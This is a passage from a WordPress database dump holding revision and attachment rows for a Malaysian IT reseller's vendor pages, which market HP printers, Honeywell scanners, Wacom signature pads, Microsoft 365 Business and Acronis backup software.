future.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div>\r\n<h3></h3>\r\n<h3 class=\"font-lh3 \">HP DesignJet large-format production printers</h3>\r\n<div class=\"description\">Turn jobs around in record time with market-leading technology that delivers fast print speeds. Produce AEC, CAD drawings, and high-quality photos, POP/POS, posters, canvas, backlits, banners, and event graphics.</div>\r\n</div>\r\n<div>\r\n<div></div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet T3500 Production Multifunction Printe</strong>r</li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/PDP_T3500_Gallery_image1_941x500_tcm245_2383669_tcm245_2383644_tcm245-2383669.jpg\" alt=\"Side view of the HP DesignJet T3500 Production Multifunction Printer\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Productivity in full color</h3>\r\n<div class=\"description\">As the most productive, cost-effective HP DesignJet MFP, HP DesignJet T3500 is built for rigorous IT demands. Meet all your black-and-white and color needs, while enjoying low cost of operation, advanced copy/scan features, and unattended operation.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6610 Production Printer</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/1_tcm245_2638421_tcm245_2624395_tcm245-2638421.jpg\" alt=\"HP DesignJet Z6610 Production Printer with gold fashion ad for output\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">The fastest graphics production printing solution</h3>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>\r\n<div>Produce sharp, durable prints with the fastest graphics production printing solution, designed to handle production peaks, and that seamlessly integrates into your current workflow.</div>\r\n<div></div>\r\n<div>\r\n<ul>\r\n 	<li class=\"small-caption\"><strong>HP DesignJet Z6810 Production Printer series</strong></li>\r\n</ul>\r\n<img class=\"\" src=\"https://www8.hp.com/us/en/images/Gallery_3_tcm245_2625574_tcm245_2625583_tcm245-2625574.jpg\" alt=\"Gold jewelry ad on HP DesignJet Z6810 Printer\" width=\"562\" height=\"299\" />\r\n<h3 class=\"font-lh3 \">Meet customer high-quality expectations with the fastest production printing solution</h3>\r\nConsistent, accurate color across prints and printers with embedded spectrophotometer. Easily create content and submit jobs using HP Applications Center.\r\n\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div>To discover more, please click the buttons below or contact us to discuss your needs.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n</div>','HP','','inherit','closed','closed','','1528-revision-v1','','','2018-12-13 22:42:00','2018-12-13 14:42:00','',1528,'https://bintara.com.my/blog/2018/12/13/1528-revision-v1/',0,'revision','',0),(2855,1,'2019-02-07 16:26:16','2019-02-07 08:26:16','','954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75','','inherit','closed','closed','','954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_evolve_75','','','2019-02-07 16:26:16','2019-02-07 08:26:16','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png',0,'attachment','image/png',0),(2450,1,'2018-12-18 21:11:40','2018-12-18 13:11:40','','scan','','inherit','closed','closed','','scan','','','2018-12-18 21:11:40','2018-12-18 13:11:40','',2048,'https://bintara.com.my/wp-content/uploads/2018/12/scan.jpg',0,'attachment','image/jpeg',0),(3586,1,'2019-09-30 16:58:51','2019-09-30 08:58:51','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table border=\"1\" cellpadding=\"10\">\r\n  <tbody>\r\n    <tr>\r\n      <td colspan=\"2\"><h4>Scanning</h4></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"40%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 16:58:51','2019-09-30 08:58:51','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(2098,1,'2018-12-13 23:12:13','2018-12-13 15:12:13','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div><img class=\"\" src=\"https://www.honeywell.com/-/media/Honeywell_com/Images/Directory-Items/engines-subcategory-jpg.jpg?h=250&amp;la=en&amp;w=250&amp;hash=ECFF3E5073513CA3042CF145B73A44127F01455F\" alt=\"Engines, Readers &amp; Sub-Assembly\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li><strong>OEM Scan Engines, Decoders &amp; Modules --Â </strong>Honeywell OEM scan engines and modules deliver industry-leading, high resolution image scan performance, even on damaged or worn barcodes.</li>\r\n</ul>\r\n<img class=\"\" src=\"https://www.honeywell.com/-/media/Honeywell_com/Images/Industries/Scanning/RFID-solutions_250-jpg.jpg?h=250&amp;la=en&amp;w=250&amp;hash=0F831B76FA00ACA9003C33B129373B584D2FA845\" alt=\"RFID solutions\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li><strong>RFID Solution --Â </strong>Honeywell RFID readers, antennas and tags bring intelligent data collection to a wide variety of industries and RFID technology applications.</li>\r\n</ul>\r\n<div>[maxbutton id=\"1\" ]</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 23:12:13','2018-12-13 15:12:13','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2449,1,'2018-12-18 21:10:43','2018-12-18 13:10:43','','honeywell','','inherit','closed','closed','','honeywell-2','','','2018-12-18 21:10:43','2018-12-18 13:10:43','',2048,'https://bintara.com.my/wp-content/uploads/2018/12/honeywell.jpg',0,'attachment','image/jpeg',0),(2451,1,'2018-12-18 21:12:36','2018-12-18 13:12:36','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div><img class=\"alignnone wp-image-2450\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scan.jpg\" alt=\"\" width=\"180\" height=\"180\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li><strong>OEM Scan Engines, Decoders &amp; Modules --Â </strong>Honeywell OEM scan engines and modules deliver industry-leading, high resolution image scan performance, even on damaged or worn barcodes.</li>\r\n</ul>\r\n<img class=\"alignnone wp-image-2449\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/honeywell.jpg\" alt=\"\" width=\"183\" height=\"183\" />\r\n<ul>\r\n 	<li><strong>RFID Solution --Â </strong>Honeywell RFID readers, antennas and tags bring intelligent data collection to a wide variety of industries and RFID technology applications.</li>\r\n</ul>\r\nTo discover more product, please click the button below or contact us to discuss your needs.\r\n<div>[maxbutton id=\"1\" ]</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-18 21:12:36','2018-12-18 13:12:36','',2048,'https://bintara.com.my/blog/2018/12/18/2048-revision-v1/',0,'revision','',0),(2099,1,'2018-12-13 23:14:45','2018-12-13 15:14:45','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n<img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Scanning --Â </strong>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" />\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Computer Device --Â </strong>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2050 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/printer-1.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Printers and MediaÂ  --Â </strong>Honeywell printers offer solutions for any environment or application: fixed, mobile, RFID printers; labels, receipts, tags, ribbons; software.</li>\r\n</ul>\r\n<div></div>\r\n<div></div>\r\n<div><img class=\" wp-image-2052 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/wearable-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li style=\"text-align: left;\"><strong>Wearable Devices --Â </strong>Honeywell wearable solutions provide a comfortable and easy-to-implement tool for mobile operators who regularly need to scan barcodes.</li>\r\n</ul>\r\n<div><img class=\"\" src=\"https://www.honeywell.com/-/media/Honeywell_com/Images/Directory-Items/engines-subcategory-jpg.jpg?h=250&amp;la=en&amp;w=250&amp;hash=ECFF3E5073513CA3042CF145B73A44127F01455F\" alt=\"Engines, Readers &amp; Sub-Assembly\" width=\"186\" height=\"186\" /></div>\r\n<div></div>\r\n<ul>\r\n 	<li><strong>OEM Scan Engines, Decoders &amp; Modules --Â </strong>Honeywell OEM scan engines and modules deliver industry-leading, high resolution image scan performance, even on damaged or worn barcodes.</li>\r\n</ul>\r\n<img class=\"\" src=\"https://www.honeywell.com/-/media/Honeywell_com/Images/Industries/Scanning/RFID-solutions_250-jpg.jpg?h=250&amp;la=en&amp;w=250&amp;hash=0F831B76FA00ACA9003C33B129373B584D2FA845\" alt=\"RFID solutions\" width=\"186\" height=\"186\" />\r\n<ul>\r\n 	<li><strong>RFID Solution --Â </strong>Honeywell RFID readers, antennas and tags bring intelligent data collection to a wide variety of industries and RFID technology applications.</li>\r\n</ul>\r\nTo discover more product, please click the buttons below or contact us to discuss your needs.\r\n<div>[maxbutton id=\"1\" ]</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2018-12-13 23:14:45','2018-12-13 15:14:45','',2048,'https://bintara.com.my/blog/2018/12/13/2048-revision-v1/',0,'revision','',0),(2101,1,'2018-12-13 23:23:55','2018-12-13 15:23:55','<h2>Wacom Business Solutions</h2>\r\n<h3 id=\"SubHeader\" class=\"subheader\">Provider of electronic signature pads, pen displays and mobile signature solutions.</h3>\r\nWhether you are interested in enhancing your digital workflow or improving the effectiveness of your visual communications, Wacom Business Solutions is here to help you. Our devices are reliable, durable, and easy to use. We can help you find the right partner for software and integration services. And if you want to develop your own software, we can help you with software development kits as well.\r\n\r\n&nbsp;\r\n<h3 id=\"Header\">Markets where Wacom pen input is changing lives</h3>\r\nFrom capturing electronic signatures to drawing directly on the screen, Wacom has a pen solution for you.\r\n\r\nIf saving time, reducing costs, and improving customer service is important to you, then you may be interested to learn how Wacom helps companies and institutions achieve these results.\r\n<h3 id=\"Header\">Hardware</h3>\r\n<p id=\"SubHeader\" class=\"subheader\">Wacom\'s full line of signature pads, pen displays, and mobile signature solutions are designed for your electronic document workflow needs.</p>\r\n&nbsp;\r\n\r\nWacom products are for organizations looking to capture handwritten electronic signatures, implement electronic forms, or to communicate visually in a natural way. Our signature pads and interactive pen display products feature Wacomâ€™s patented pressure-sensitive, battery-free and cordless pen technology. All Wacom products are reliable and dependable. They all feature protective cover glass that is scratch resistant for long life and durable operation. Our electronic pens, for the counter or desktop, never need batteries or a cord to carry an electronic signal. Since no electronic signals are passed through the pen tether, pen operation cannot be affected by damage to the tether. And all Wacom pen input devices provide outstanding accuracy and control which makes your digital experience feel like real world.\r\n\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Wacom','','inherit','closed','closed','','1610-revision-v1','','','2018-12-13 23:23:55','2018-12-13 15:23:55','',1610,'https://bintara.com.my/blog/2018/12/13/1610-revision-v1/',0,'revision','',0),(2105,1,'2018-12-13 23:38:45','2018-12-13 15:38:45','As a Microsoft Certified Partner, we have been recognized for our expertise and contribution to developing Microsoft based solutions.\r\n<h3 class=\"pmg-ff-segoe-ui-regular no-margin pmg-cl-outlook m-pmg-pv-1500\">Microsoft 365 Business</h3>\r\n<p class=\"no-margin body-alt pmg-pv-1535 pmg-cl-black\">An integrated solution, bringing together the best-in-class productivity of Office 365 with advanced security and device management capabilities to help safeguard your business.</p>\r\n\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black pmg-mv-1020 header xs-pmg-pv-0500 m-pmg-pv-0000\">Get more done</h4>\r\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Create your best work with intelligent tools built in to Office.</li>\r\n 	<li class=\"body-alt\">Get work done with enterprise grade email and calendaring.</li>\r\n 	<li class=\"body-alt\">Access your files from anywhere with online file storage.</li>\r\n 	<li class=\"body-alt\">Easily integrate with other commonly used apps and solutions.</li>\r\n</ul>\r\n&nbsp;\r\n<h4 class=\"pmg-ff-segoe-ui-regular no-margin pmg-cl-white pmg-pv-1015\">Work better together</h4>\r\n<ul class=\"body-alt pmg-cl-white no-margin pmg-pv-0005 pmg-list-style-none pmg-ph-0000 pmg-mv-0015\">\r\n 	<li class=\"body-alt\">Bring together teams and resources, all in one place.</li>\r\n 	<li class=\"body-alt\">Connect with customers, coworkers, and suppliers.</li>\r\n 	<li class=\"body-alt\">Host online meetings to increase collaboration and productivity.</li>\r\n 	<li class=\"body-alt\">Work anywhere from any device.</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"m-pmg-mv-3000 xs-pmg-mv-6000\">\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black xs-pmg-mv-1520 m-pmg-mv-1020\">Safeguard your data</h4>\r\n</div>\r\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-pv-0010 pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Help protect against security threats.</li>\r\n 	<li class=\"body-alt\">Help secure your business data from accidental leaks.</li>\r\n 	<li class=\"body-alt\">Control who has access to your business information.</li>\r\n 	<li class=\"body-alt\">Gain peace of mind that you have tools to help you remain compliant.</li>\r\n</ul>','Microsoft','','inherit','closed','closed','','1551-revision-v1','','','2018-12-13 23:38:45','2018-12-13 15:38:45','',1551,'https://bintara.com.my/blog/2018/12/13/1551-revision-v1/',0,'revision','',0),(2106,1,'2018-12-13 23:39:10','2018-12-13 15:39:10','As a Microsoft Certified Partner, we have been recognized for our expertise and contribution to developing Microsoft based solutions.\r\n<h3 class=\"pmg-ff-segoe-ui-regular no-margin pmg-cl-outlook m-pmg-pv-1500\">Microsoft 365 Business</h3>\r\n<p class=\"no-margin body-alt pmg-pv-1535 pmg-cl-black\">An integrated solution, bringing together the best-in-class productivity of Office 365 with advanced security and device management capabilities to help safeguard your business.</p>\r\n\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black pmg-mv-1020 header xs-pmg-pv-0500 m-pmg-pv-0000\">Get more done</h4>\r\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Create your best work with intelligent tools built in to Office.</li>\r\n 	<li class=\"body-alt\">Get work done with enterprise grade email and calendaring.</li>\r\n 	<li class=\"body-alt\">Access your files from anywhere with online file storage.</li>\r\n 	<li class=\"body-alt\">Easily integrate with other commonly used apps and solutions.</li>\r\n</ul>\r\n&nbsp;\r\n<h4 class=\"pmg-ff-segoe-ui-regular no-margin pmg-cl-white pmg-pv-1015\">Work better together</h4>\r\n<ul class=\"body-alt pmg-cl-white no-margin pmg-pv-0005 pmg-list-style-none pmg-ph-0000 pmg-mv-0015\">\r\n 	<li class=\"body-alt\">Bring together teams and resources, all in one place.</li>\r\n 	<li class=\"body-alt\">Connect with customers, coworkers, and suppliers.</li>\r\n 	<li class=\"body-alt\">Host online meetings to increase collaboration and productivity.</li>\r\n 	<li class=\"body-alt\">Work anywhere from any device.</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"m-pmg-mv-3000 xs-pmg-mv-6000\">\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black xs-pmg-mv-1520 m-pmg-mv-1020\">Safeguard your data</h4>\r\n</div>\r\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-pv-0010 pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Help protect against security threats.</li>\r\n 	<li class=\"body-alt\">Help secure your business data from accidental leaks.</li>\r\n 	<li class=\"body-alt\">Control who has access to your business information.</li>\r\n 	<li class=\"body-alt\">Gain peace of mind that you have tools to help you remain compliant.</li>\r\n</ul>\r\n&nbsp;\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black pmg-mv-1020 header xs-pmg-pv-0500 m-pmg-pv-0000 x-hidden-focus\">Simplified for you</h4>\r\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Choose solutions that are right for your business.</li>\r\n 	<li class=\"body-alt\">Get more value for your money.</li>\r\n 	<li class=\"body-alt\">Give your employees to tools they need.</li>\r\n 	<li class=\"body-alt x-hidden-focus\">Ensure you have the latest features and security updates.</li>\r\n</ul>','Microsoft','','inherit','closed','closed','','1551-revision-v1','','','2018-12-13 23:39:10','2018-12-13 15:39:10','',1551,'https://bintara.com.my/blog/2018/12/13/1551-revision-v1/',0,'revision','',0),(2107,1,'2018-12-13 23:42:07','2018-12-13 15:42:07','As a Microsoft Certified Partner, we have been recognized for our expertise and contribution to developing Microsoft based solutions.\r\n<h3 class=\"pmg-ff-segoe-ui-regular no-margin pmg-cl-outlook m-pmg-pv-1500\">Microsoft 365 Business</h3>\r\n<p class=\"no-margin body-alt pmg-pv-1535 pmg-cl-black\">An integrated solution, bringing together the best-in-class productivity of Office 365 with advanced security and device management capabilities to help safeguard your business.</p>\r\n\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black pmg-mv-1020 header xs-pmg-pv-0500 m-pmg-pv-0000\">Get more done</h4>\r\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Create your best work with intelligent tools built in to Office.</li>\r\n 	<li class=\"body-alt\">Get work done with enterprise grade email and calendaring.</li>\r\n 	<li class=\"body-alt\">Access your files from anywhere with online file storage.</li>\r\n 	<li class=\"body-alt\">Easily integrate with other commonly used apps and solutions.</li>\r\n</ul>\r\n&nbsp;\r\n<h4 class=\"pmg-ff-segoe-ui-regular no-margin pmg-cl-white pmg-pv-1015\">Work better together</h4>\r\n<ul class=\"body-alt pmg-cl-white no-margin pmg-pv-0005 pmg-list-style-none pmg-ph-0000 pmg-mv-0015\">\r\n 	<li class=\"body-alt\">Bring together teams and resources, all in one place.</li>\r\n 	<li class=\"body-alt\">Connect with customers, coworkers, and suppliers.</li>\r\n 	<li class=\"body-alt\">Host online meetings to increase collaboration and productivity.</li>\r\n 	<li class=\"body-alt\">Work anywhere from any device.</li>\r\n</ul>\r\n&nbsp;\r\n<div class=\"m-pmg-mv-3000 xs-pmg-mv-6000\">\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black xs-pmg-mv-1520 m-pmg-mv-1020\">Safeguard your data</h4>\r\n</div>\r\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-pv-0010 pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Help protect against security threats.</li>\r\n 	<li class=\"body-alt\">Help secure your business data from accidental leaks.</li>\r\n 	<li class=\"body-alt\">Control who has access to your business information.</li>\r\n 	<li class=\"body-alt\">Gain peace of mind that you have tools to help you remain compliant.</li>\r\n</ul>\r\n&nbsp;\r\n<h4 class=\"subheader pmg-ff-segoe-ui-normal pmg-cl-black pmg-mv-1020 header xs-pmg-pv-0500 m-pmg-pv-0000 x-hidden-focus\">Simplified for you</h4>\r\n<ul class=\"body-alt pmg-ff-segoe-ui-normal pmg-cl-black pmg-list-style-none pmg-ph-0000\">\r\n 	<li class=\"body-alt\">Choose solutions that are right for your business.</li>\r\n 	<li class=\"body-alt\">Get more value for your money.</li>\r\n 	<li class=\"body-alt\">Give your employees to tools they need.</li>\r\n 	<li class=\"body-alt x-hidden-focus\">Ensure you have the latest features and security updates.</li>\r\n</ul>\r\n&nbsp;\r\n<h4 class=\"pmg-ff-segoe-ui-regular header no-margin pmg-pv-0020 pmg-cl-black\">Discover the Microsoft 365 Business advantage</h4>\r\n<p class=\" no-margin  xs-pmg-pv-0010 m-pmg-pv-0020 pmg-cl-black\">Microsoft 365 Business brings together features from across Microsoftâ€™s offerings in a solution designed for small and medium-sized businesses. Itâ€™s powered by Office 365 and Windows 10, with device management and security features to help ensure your companyâ€™s data is protected.</p>','Microsoft','','inherit','closed','closed','','1551-revision-v1','','','2018-12-13 23:42:07','2018-12-13 15:42:07','',1551,'https://bintara.com.my/blog/2018/12/13/1551-revision-v1/',0,'revision','',0),(2859,1,'2019-02-07 16:31:19','2019-02-07 08:31:19','','Evolve_20','','inherit','closed','closed','','evolve_20','','','2019-02-07 16:31:19','2019-02-07 08:31:19','',1532,'https://bintara.com.my/wp-content/uploads/2019/02/Evolve_20.png',0,'attachment','image/png',0),(2118,1,'2018-12-14 09:03:11','2018-12-14 01:03:11','<h2>Acronis Backup Software for Business</h2>\r\n<h2></h2>\r\n<h3>Every Acronis backup solution delivers</h3>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2018-12-14 09:03:11','2018-12-14 01:03:11','',1435,'https://bintara.com.my/blog/2018/12/14/1435-revision-v1/',0,'revision','',0),(2111,1,'2018-12-13 23:47:08','2018-12-13 15:47:08','<h2>Acronis Backup Software for Business</h2>\r\n<h2></h2>\r\n<h3>Every Acronis backup solution delivers</h3>\r\n<div class=\"row\">\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0003-l-active-ransomware-protection@2x.png\" alt=\"\" />\r\n<h3>Active Ransomware Protection</h3>\r\n<div>Detects and stops both known and unknown strains of ransomware</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0057-l-scalability@2x.png\" alt=\"\" />\r\n<h3>Platform Flexibility</h3>\r\n<div>Protects data no matter where it lives: from laptops and mobile devices, to hypervisors, VMs, and more</div>\r\n</div>\r\n</div>\r\n<div class=\"col col-4\">\r\n<div>\r\n\r\n<img src=\"https://www.acronis.com/sites/default/public_files/promotions/keywords_split_lp_2019/0041-l-cover-everything@2x.png\" alt=\"\" />\r\n<h3>Total Control</h3>\r\n<div>Lets you manage backup and recovery efforts on your terms, including remote and mobile access</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div></br></div>\r\n<div>[maxbutton id=\"1\" ]</div>','Acronis','','inherit','closed','closed','','1435-revision-v1','','','2018-12-13 23:47:08','2018-12-13 15:47:08','',1435,'https://bintara.com.my/blog/2018/12/13/1435-revision-v1/',0,'revision','',0),(2119,1,'2018-12-14 09:06:54','2018-12-14 01:06:54','<h3>Anydesk</h3>\r\n<h4 class=\"u-font-size-xl u-space-mt-1/2 